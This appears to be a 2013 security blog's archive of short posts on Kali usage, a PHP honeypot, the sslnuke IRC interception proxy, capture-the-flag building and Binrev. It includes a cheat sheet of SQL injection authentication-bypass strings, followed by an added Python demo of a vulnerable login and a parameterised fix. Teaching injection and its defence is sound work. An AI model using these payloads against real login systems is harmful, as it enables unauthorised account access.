Sep 14, 2013

Howto: Google Chrome on Kali with a non-root user

1. Download Google Chrome

2. Install it
sudo dpkg -i google-chrome-stable_current_amd64.deb

3. Install sux
sudo apt-get install sux

4. Run google-chrome with sux
sux - nonroot google-chrome

5. Check the owner of the google-chrome process
ps -ef | grep google




Sep 12, 2013

Honeypot: PHP Script For Honeypot

This PHP script logs all HTTP requests (GET/POST/HEAD/etc.) into the
appropriate log files. Each line is a JSON entry. File names are
based on the day.


Source: https://github.com/kbandla/exploitbay/tree/master/honeypot


Sep 11, 2013

Tools: sslnuke - Transparent proxy that decrypts SSL traffic and prints out IRC messages.

HTTPS is not the only protocol that uses SSL. Unfortunately, many clients for these other protocols do not verify certificates by default, and even if they did, there is no guarantee of secure certificate transfer. After all, how many people are willing to pay $50 for an SSL certificate for their FTPS server?
A common protocol that uses SSL but is rarely verified is IRC. Many IRC clients verify by default, but most users will turn this off because IRC server administrators tend not to purchase legitimate SSL certificates. Some popular clients even leave SSL verification off by default (IRSSI, for example). We already know that this is unwise: any attacker between a user and the IRC server can offer an invalid certificate and decrypt all of the user's traffic (including possibly sensitive messages). Most users don't even consider this fact when connecting to an SSL "secured" IRC server.
sslnuke is a tool geared towards decrypting and intercepting "secured" IRC traffic. There are plenty of existing tools that intercept SSL traffic already, but most of these are geared towards HTTP traffic. sslnuke targets IRC directly in order to demonstrate how easy it is to intercept "secured" communications. sslnuke usage is simple.

Source: https://github.com/jtRIPper/sslnuke



Build Your Own Capture The Flag

Remaster Linux Live CD images for the purpose of creating ready to use security wargames with pre-installed vulnerabilities to exploit.
 
 



Cheat Sheet: SQL Injection for Authentication Bypass

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
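Why entries like these get past a login form, and the fix, as an added example that is not part of the original post: a login check that concatenates input into the SQL text next to one that binds it as a parameter. The schema, account, salt and function names are hypothetical, and SQLite stands in for the application database, so the `#` entries (MySQL comment syntax) are left out.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-demo-salt"  # real systems store a random salt per user

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()

def make_db():
    # Hypothetical schema with one constructed account.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", pw_hash("correct horse")))
    return db

def login_vulnerable(db, username, password):
    # The pattern the cheat sheet targets: input spliced into the SQL text, so a
    # quote in `username` ends the string literal and rewrites the WHERE clause.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # payload written for another dialect or query shape

def login_hardened(db, username, password):
    # Placeholder binding: the driver passes `username` as data, never as SQL.
    row = db.execute("SELECT pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    # The password is checked in application code with a constant-time compare.
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))

# Three single-quote entries copied from the cheat sheet above.
PAYLOADS = ["admin' --", "admin' or '1'='1", "admin' or 1=1--"]

def compare(db):
    # Maps each payload to (vulnerable result, hardened result) with a wrong password.
    return {p: (login_vulnerable(db, p, "x"), login_hardened(db, p, "x"))
            for p in PAYLOADS}

if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, hard) in compare(db).items():
        print(f"{payload!r:22} vulnerable={vuln} hardened={hard}")
```

The hardened form also accepts usernames that legitimately contain a quote, which is why binding is preferred over filtering or escaping input.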
 





Binrev - Automate Reversing Windows Binaries for Pentesters

What can you do with this?

  • Static analysis: you can do a basic manual code review for decompiled sources to discover hidden communication channels, search for hard-coded passwords, or SQL injection vulnerabilities.
  • Import decompiled projects to an IDE to reconstruct and modify the original source code
  • Call hidden native exported functions with rundll32
 Source: https://www.netspi.com/blog/entryid/196/binrev-automate-reversing-windows-binaries-for-pentesters


 
